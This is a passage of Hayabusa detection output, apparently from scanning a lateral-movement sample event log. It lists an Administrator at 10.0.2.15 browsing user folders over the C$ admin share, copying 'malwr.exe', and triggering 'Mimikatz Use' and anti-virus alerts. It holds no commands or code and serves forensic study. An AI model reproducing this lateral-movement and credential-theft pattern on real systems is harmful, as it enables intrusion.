Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 